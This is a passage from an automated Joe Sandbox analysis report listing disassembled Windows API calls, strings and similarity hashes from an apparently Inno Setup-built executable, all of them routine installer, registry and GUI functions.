                                                                            • API ID: FocusMessageStateTextWaitWindow
                                                                            • String ID: Wnd=$%x
                                                                            • API String ID: 1381870634-2927251529
                                                                            • Opcode ID: b6f1723f8a55a4a9afafee02d062e7fd811883cc0c30f314c2a81b90cb0acb04
                                                                            • Instruction ID: f4d105e05b809c76e67ff73c629a241912eba9488d1d76ce0f5d4fdfd1301c88
                                                                            • Opcode Fuzzy Hash: b6f1723f8a55a4a9afafee02d062e7fd811883cc0c30f314c2a81b90cb0acb04
                                                                            • Instruction Fuzzy Hash: 67119170600244BFC710EF65DC52A9E7BB8EB49705B5184BAF408E3751D63DAE00DA6D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • FileTimeToLocalFileTime.KERNEL32(?), ref: 0046A04C
                                                                            • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 0046A05B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Time$File$LocalSystem
                                                                            • String ID: %.4u-%.2u-%.2u %.2u:%.2u:%.2u.%.3u$(invalid)
                                                                            • API String ID: 1748579591-1013271723
                                                                            • Opcode ID: dc3105fb6ee909ab4cd4d42845ef41477d175ff5fb8b3213b724df48f3a92d37
                                                                            • Instruction ID: 9e815eb500cce11188de23773c3f03aef7f324e38ca19cda18ee53b31b17b2fc
                                                                            • Opcode Fuzzy Hash: dc3105fb6ee909ab4cd4d42845ef41477d175ff5fb8b3213b724df48f3a92d37
                                                                            • Instruction Fuzzy Hash: 9B11F8A140C3919ED340DF2AC44436BBAE4AB89704F44896EF9D8D6381E779C948DB77
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • SetFileAttributesA.KERNEL32(00000000,00000020), ref: 004527E3
                                                                              • Part of subcall function 00406EB8: DeleteFileA.KERNEL32(00000000,00494628,00492509,00000000,0049255E,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406EC3
                                                                            • MoveFileA.KERNEL32(00000000,00000000), ref: 00452808
                                                                              • Part of subcall function 00451E20: GetLastError.KERNEL32(00000000,00452891,00000005,00000000,004528C6,?,?,00000000,00494628,00000004,00000000,00000000,00000000,?,004921BD,00000000), ref: 00451E23
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: File$AttributesDeleteErrorLastMove
                                                                            • String ID: DeleteFile$MoveFile
                                                                            • API String ID: 3024442154-139070271
                                                                            • Opcode ID: 8a70b1347f387fedb58c3f0c09c3bda5820d5cffeb643f0c2558e4fcea15fbdb
                                                                            • Instruction ID: 7497217c6fa166c3be30eb44807793be619cf2db8189df8da4fe663aa424cbd4
                                                                            • Opcode Fuzzy Hash: 8a70b1347f387fedb58c3f0c09c3bda5820d5cffeb643f0c2558e4fcea15fbdb
                                                                            • Instruction Fuzzy Hash: 8EF062746041045AE701FAA5DA4366FA3ECEB4530AF61403BF800B76C3DA7C9D094929
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0047DDF7,?,00000001,?,?,0047DDF7,?,00000001,00000000), ref: 0042DC70
                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004578A2,00000000,004579EF,?,00000000,00000000,00000000), ref: 004577BD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseOpen
                                                                            • String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
                                                                            • API String ID: 47109696-2631785700
                                                                            • Opcode ID: 6e8da870c8621b75cc6768b696cde9fcf8d5864872e34247e5d0abe67aef6327
                                                                            • Instruction ID: a26262d4258d3973e1aab989b25d4896129656d7849361439c1335197d99e5e3
                                                                            • Opcode Fuzzy Hash: 6e8da870c8621b75cc6768b696cde9fcf8d5864872e34247e5d0abe67aef6327
                                                                            • Instruction Fuzzy Hash: D5F0FF327141106FC710EB1AFC45F0E6688DB9839AF10803BB940C725AC678DC0AC62D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0047DDF7,?,00000001,?,?,0047DDF7,?,00000001,00000000), ref: 0042DC70
                                                                            • RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 0047DE19
                                                                            • RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 0047DE3C
                                                                            Strings
                                                                            • System\CurrentControlSet\Control\Windows, xrefs: 0047DDE6
                                                                            • CSDVersion, xrefs: 0047DE10
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseOpenQueryValue
                                                                            • String ID: CSDVersion$System\CurrentControlSet\Control\Windows
                                                                            • API String ID: 3677997916-1910633163
                                                                            • Opcode ID: 7813b641c3abcab23e33f1a9844fd0c9a7e2724cdb6d20ee4d37ca6bcb8a843c
                                                                            • Instruction ID: 975d92485e8303bca6679b963d7ec8b17629a584e5fbb74d879917827c530b39
                                                                            • Opcode Fuzzy Hash: 7813b641c3abcab23e33f1a9844fd0c9a7e2724cdb6d20ee4d37ca6bcb8a843c
                                                                            • Instruction Fuzzy Hash: 5CF0A475E10609AADF11DAD0CC45BEF73BCAF14304F208567EA18EB280E7789A04CB59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,004524DE,00000000,00452581,?,?,00000000,00000000,00000000,00000000,00000000,?,0045284D,00000000), ref: 0042D7E6
                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D7EC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressHandleModuleProc
                                                                            • String ID: GetSystemWow64DirectoryA$kernel32.dll
                                                                            • API String ID: 1646373207-4063490227
                                                                            • Opcode ID: bcb006e1001e7ceda0f2158fab1331f88fd866345d5b6bb6a223a4a56a439a00
                                                                            • Instruction ID: 4db8f333c9a0d948aa4d288d669557f69a64c6eaa67e0ad6c3f7b03414b73d9c
                                                                            • Opcode Fuzzy Hash: bcb006e1001e7ceda0f2158fab1331f88fd866345d5b6bb6a223a4a56a439a00
                                                                            • Instruction Fuzzy Hash: 23E04F61B44B1112D7107ABA9C83A5B10898B88724FA0843B79A5E72C7EDBCD94A1A7D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00492971), ref: 0044F013
                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F019
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressHandleModuleProc
                                                                            • String ID: NotifyWinEvent$user32.dll
                                                                            • API String ID: 1646373207-597752486
                                                                            • Opcode ID: 14387aedca7aefdef0683c3ddaa71b572771d7d4e504a8f70a8313ae2fd5082f
                                                                            • Instruction ID: d5e9afbdc33ce2732c9423c566c922af1deae432a4d89253bf7da83917605eba
                                                                            • Opcode Fuzzy Hash: 14387aedca7aefdef0683c3ddaa71b572771d7d4e504a8f70a8313ae2fd5082f
                                                                            • Instruction Fuzzy Hash: 8DE0ECE0A42344AEFB10BBF6E942B1B2A90E7D571DB10007BB2006A593CB7C040A8A1E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,004929BD,00000001,00000000,004929E1), ref: 00492746
                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0049274C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressHandleModuleProc
                                                                            • String ID: DisableProcessWindowsGhosting$user32.dll
                                                                            • API String ID: 1646373207-834958232
                                                                            • Opcode ID: 35b9077db0bf85f0e7bfa9aca20f55309094321a33a805c10598d3184199be09
                                                                            • Instruction ID: eaa947335cb6f520d9ee4e24e6959d85bb97eec5577cdd685d5abce296b2953a
                                                                            • Opcode Fuzzy Hash: 35b9077db0bf85f0e7bfa9aca20f55309094321a33a805c10598d3184199be09
                                                                            • Instruction Fuzzy Hash: 31B09280281702748C1032F20E46E1B4888488072571404B73400B10C2CDEC880528AD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 0044AEEC: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F009,00492971), ref: 0044AF13
                                                                              • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044AF2B
                                                                              • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044AF3D
                                                                              • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044AF4F
                                                                              • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044AF61
                                                                              • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF73
                                                                              • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF85
                                                                              • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044AF97
                                                                              • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044AFA9
                                                                              • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044AFBB
                                                                              • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044AFCD
                                                                              • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044AFDF
                                                                              • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044AFF1
                                                                              • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B003
                                                                              • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B015
                                                                              • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B027
                                                                              • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B039
                                                                              • Part of subcall function 0044AEEC: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B04B
                                                                            • LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,0049298F), ref: 00460B03
                                                                            • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00460B09
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$LibraryLoad
                                                                            • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                            • API String ID: 2238633743-2683653824
                                                                            • Opcode ID: d51c42bd4142a1419cebe145bcc4e62e91902ea29c04febc714d013a4538a5c6
                                                                            • Instruction ID: 1dc59214256150821f64c4a5b3e010dcdd688bc926fb1e8d07287d1f160dc46b
                                                                            • Opcode Fuzzy Hash: d51c42bd4142a1419cebe145bcc4e62e91902ea29c04febc714d013a4538a5c6
                                                                            • Instruction Fuzzy Hash: EFB09290B80700A19E00B7F25883D2B140C8580F1D720847B7010791DBEA7C500099AE
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetDesktopWindow.USER32 ref: 00413CB6
                                                                            • GetDesktopWindow.USER32 ref: 00413D6E
                                                                              • Part of subcall function 00418E30: 6F5AC6F0.COMCTL32(?,00000000,00413F33,00000000,00414043,?,?,00494628), ref: 00418E4C
                                                                              • Part of subcall function 00418E30: ShowCursor.USER32(00000001,?,00000000,00413F33,00000000,00414043,?,?,00494628), ref: 00418E69
                                                                            • SetCursor.USER32(00000000,?,?,?,?,00413A63,00000000,00413A76), ref: 00413DAC
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CursorDesktopWindow$Show
                                                                            • String ID:
                                                                            • API String ID: 2074268717-0
                                                                            • Opcode ID: 45eab49b9f5213df2d83ef42053e3571740e663cae2ab16979cfe5a355df0160
                                                                            • Instruction ID: f419cdb22dffc734eda11f614feaf6954746e02452764f6a113fc2dd2abbdfc2
                                                                            • Opcode Fuzzy Hash: 45eab49b9f5213df2d83ef42053e3571740e663cae2ab16979cfe5a355df0160
                                                                            • Instruction Fuzzy Hash: C7419275600110AFC700EFB9E984F4677E0AB95315B1684BBE104CB365DA38ED82CF69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 004089DD
                                                                            • LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408A4C
                                                                            • LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408AE7
                                                                            • MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408B26
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: LoadString$FileMessageModuleName
                                                                            • String ID:
                                                                            • API String ID: 704749118-0
                                                                            • Opcode ID: 9475b91f6b12abc75ac03e97528c4589aec67ab33c443f8169a5e3803f66a059
                                                                            • Instruction ID: 14e0b5c6cd5b97c86ff82054d5328c9cf2b7980ad66a2a36783bbd85928cae88
                                                                            • Opcode Fuzzy Hash: 9475b91f6b12abc75ac03e97528c4589aec67ab33c443f8169a5e3803f66a059
                                                                            • Instruction Fuzzy Hash: 6E3143706083809FD330EB65C945B9B77E89B8A304F40483FB6C8E72D1DB7999058767
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E1A1
                                                                              • Part of subcall function 0044C7E4: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044C816
                                                                            • InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E225
                                                                              • Part of subcall function 0042BB24: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BB38
                                                                            • IsRectEmpty.USER32(?), ref: 0044E1E7
                                                                            • ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E20A
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
                                                                            • String ID:
                                                                            • API String ID: 855768636-0
                                                                            • Opcode ID: 2f4f09d471764e0b40a61100a36ec5f960fc55f7f790cb04e4501a849a6d4287
                                                                            • Instruction ID: 5406ccee5fb56c270110fdf5510288933eb71161ddc8a876bede12871bf79798
                                                                            • Opcode Fuzzy Hash: 2f4f09d471764e0b40a61100a36ec5f960fc55f7f790cb04e4501a849a6d4287
                                                                            • Instruction Fuzzy Hash: 6E114D71B4031027E210BA7E9C86B5B66CDAB88749F04493FB605EB383DEB9DC058299
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • OffsetRect.USER32(?,?,00000000), ref: 0048F8C0
                                                                            • OffsetRect.USER32(?,00000000,?), ref: 0048F8DB
                                                                            • OffsetRect.USER32(?,?,00000000), ref: 0048F8F5
                                                                            • OffsetRect.USER32(?,00000000,?), ref: 0048F910
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: OffsetRect
                                                                            • String ID:
                                                                            • API String ID: 177026234-0
                                                                            • Opcode ID: b92cc9e0c51abad00843a30158c78bfcdf3235bd319301de45a4e2a650a825ad
                                                                            • Instruction ID: ce36c56c1c582fdda7e72a0fface693b427ee6f0177311c7c28b849f91f6b588
                                                                            • Opcode Fuzzy Hash: b92cc9e0c51abad00843a30158c78bfcdf3235bd319301de45a4e2a650a825ad
                                                                            • Instruction Fuzzy Hash: 0F217CB6700201ABD300EE69CC85E5BB7DEEBD4344F14CA3AF954C7249D738E94887A6
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetCursorPos.USER32 ref: 004171D0
                                                                            • SetCursor.USER32(00000000), ref: 00417213
                                                                            • GetLastActivePopup.USER32(?), ref: 0041723D
                                                                            • GetForegroundWindow.USER32(?), ref: 00417244
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Cursor$ActiveForegroundLastPopupWindow
                                                                            • String ID:
                                                                            • API String ID: 1959210111-0
                                                                            • Opcode ID: c1cfbe4ca0de68e17c4a100ee12b51fff2b36c6f0ea2abcdeec6e8c4ace2589f
                                                                            • Instruction ID: 088d0700f5649383027441de99f76d51f9d962fb002c63a2b2ca12876e25bed5
                                                                            • Opcode Fuzzy Hash: c1cfbe4ca0de68e17c4a100ee12b51fff2b36c6f0ea2abcdeec6e8c4ace2589f
                                                                            • Instruction Fuzzy Hash: 192183713086018ACB20ABA9D889AD733F1AF85714F0545ABF8589B792D73DDC82CB59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • MulDiv.KERNEL32(8B500000,00000008,?), ref: 0048F529
                                                                            • MulDiv.KERNEL32(50142444,00000008,?), ref: 0048F53D
                                                                            • MulDiv.KERNEL32(F76037E8,00000008,?), ref: 0048F551
                                                                            • MulDiv.KERNEL32(8BF88BFF,00000008,?), ref: 0048F56F
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6335ae3c13ddf35d91c6dca3ece5bfa36ba83b479f3d3f49975b0228b2d303f4
                                                                            • Instruction ID: 6f2f5d3731a38f560a61ba406435f1238513cd740096e42b36e3bab7bd81765c
                                                                            • Opcode Fuzzy Hash: 6335ae3c13ddf35d91c6dca3ece5bfa36ba83b479f3d3f49975b0228b2d303f4
                                                                            • Instruction Fuzzy Hash: AA112172604204BBCB40EEADC8C4D9B77ECEF4D360B24416AF918DB246D634ED408BA8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetClassInfoA.USER32(00400000,0041F3E0,?), ref: 0041F411
                                                                            • UnregisterClassA.USER32(0041F3E0,00400000), ref: 0041F43A
                                                                            • RegisterClassA.USER32(00493598), ref: 0041F444
                                                                            • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F47F
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                            • String ID:
                                                                            • API String ID: 4025006896-0
                                                                            • Opcode ID: 369b4581b8718a6b7f5c456dac74c697fddaa2f7eb52355fd25e4240f497afd1
                                                                            • Instruction ID: ba8a097de1154e85499311c45b2324022c4db67c4a949dbf0f11183773784737
                                                                            • Opcode Fuzzy Hash: 369b4581b8718a6b7f5c456dac74c697fddaa2f7eb52355fd25e4240f497afd1
                                                                            • Instruction Fuzzy Hash: 720152712401047BCB20EF68ED81E9B37ACA76D314B11413BBA05E72E1D635DD165BAD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D187
                                                                            • LoadResource.KERNEL32(00400000,72756F73,0040A928,00400000,00000001,00000000,?,0040D0E4,00000000,?,00000000,?,?,0047764C,0000000A,REGDLL_EXE), ref: 0040D1A1
                                                                            • SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A928,00400000,00000001,00000000,?,0040D0E4,00000000,?,00000000,?,?,0047764C), ref: 0040D1BB
                                                                            • LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A928,00400000,00000001,00000000,?,0040D0E4,00000000,?,00000000,?), ref: 0040D1C5
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                            • String ID:
                                                                            • API String ID: 3473537107-0
                                                                            • Opcode ID: b3c15c4636e7b2139434bed422b55b0694fd43cf85b07dfc26612a38abd02691
                                                                            • Instruction ID: a2e4909c1946fcd89949086e6ecb513f2c22862e5b7fa6f76d970aa484769738
                                                                            • Opcode Fuzzy Hash: b3c15c4636e7b2139434bed422b55b0694fd43cf85b07dfc26612a38abd02691
                                                                            • Instruction Fuzzy Hash: BEF0FF726056046F9754EE9DA881D5B76ECDE48264320416AF908EB246DE38DD118B78
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,00494450,?,?,?,004018B4), ref: 00401566
